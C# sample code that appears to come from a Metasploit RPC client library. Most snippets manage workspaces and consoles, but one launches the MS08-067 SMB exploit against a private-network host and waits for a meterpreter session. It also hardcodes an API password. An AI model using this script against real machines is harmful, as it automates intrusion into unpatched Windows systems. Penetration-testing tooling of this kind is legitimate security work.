public static void Main(string[] args) { using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1")) { using (MetasploitProManager manager = new MetasploitProManager(session)) { string workspace = Guid.NewGuid().ToString(); Dictionary<object, object> options = new Dictionary<object, object>(); options.Add("name", workspace); Dictionary<object, object> response = manager.AddProProject(options); foreach (var pair in response) Console.WriteLine(pair.Key + ": " + pair.Value); response = manager.DeleteProWorkspace(workspace); foreach (var pair in response) Console.WriteLine(pair.Key + ": " + pair.Value); response = manager.CreateConsole(); workspace = Guid.NewGuid().ToString(); string consoleID = response["id"] as string; response = manager.WriteToConsole(consoleID, "workspace -a " + workspace + "\n"); response = manager.WriteToConsole(consoleID, "workspace\n"); response = manager.WriteToConsole(consoleID, "workspace -d " + workspace + "\n"); response = manager.ReadConsole(consoleID); foreach (var pair in response) Console.WriteLine(pair.Key + ": " + pair.Value); manager.DestroyConsole(consoleID); } } }
public static void Main(string[] args) { using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1")) { if (string.IsNullOrEmpty(session.Token)) throw new Exception("Login failed. Check credentials"); using (MetasploitProManager manager = new MetasploitProManager(session)) { // Dictionary<object, object> options = new Dictionary<object, object>(); // options.Add("RHOST", "192.168.1.129"); // options.Add("RPORT", "445"); // options.Add("LPORT", new Random().Next(1001, 50000)); // // Dictionary<object, object> response = manager.ExecuteModule("exploit", "windows/smb/ms08_067_netapi", options); // // foreach (KeyValuePair<object, object> pair in response) // Console.WriteLine(pair.Key + ": " + pair.Value); var response = manager.CreateConsole(); foreach (var pair in response) Console.WriteLine(pair.Key + ": " + pair.Value); string consoleID = response["id"] as string; Console.WriteLine("Setting up options..."); response = manager.WriteToConsole(consoleID, "use exploit/windows/smb/ms08_067_netapi\n"); System.Threading.Thread.Sleep(6000); response = manager.WriteToConsole(consoleID, "set RHOST 192.168.1.129\n"); System.Threading.Thread.Sleep(6000); response = manager.WriteToConsole(consoleID, "set LPORT " + new Random().Next(1001, 50000) + "\n"); System.Threading.Thread.Sleep(6000); Console.WriteLine("Exploiting..."); response = manager.WriteToConsole(consoleID, "exploit\n"); System.Threading.Thread.Sleep(12000); bool busy = true; while (busy) { response = manager.ReadConsole(consoleID); foreach (var pair in response) Console.WriteLine(pair.Key + ": " + pair.Value); busy = bool.Parse(response["busy"].ToString()); if ((response["prompt"] as string).Contains("meterpreter")) break; } response = manager.ListSessions(); foreach (var pair in response) foreach (var p in pair.Value as Dictionary<object, object>) Console.WriteLine(p.Key + ": " + p.Value); manager.DestroyConsole(consoleID); } } }
private void CreateNewMetasploitWorkspace(string workspace) { using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"], this.Configuration["metasploitPass"], "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1")) { using (MetasploitProManager manager = new MetasploitProManager(session)) { // Dictionary<object, object> options = new Dictionary<object, object>(); // options.Add("name", workspace); // // manager.AddProWorkspace(options); Dictionary<string, object> response = manager.CreateConsole (); string consoleID = response ["id"] as string; manager.WriteToConsole (consoleID, "workspace -a \"" + workspace + "\"\n"); Thread.Sleep (new TimeSpan (0, 0, 30)); manager.WriteToConsole (consoleID, "workspace \n"); manager.DestroyConsole (consoleID); } } }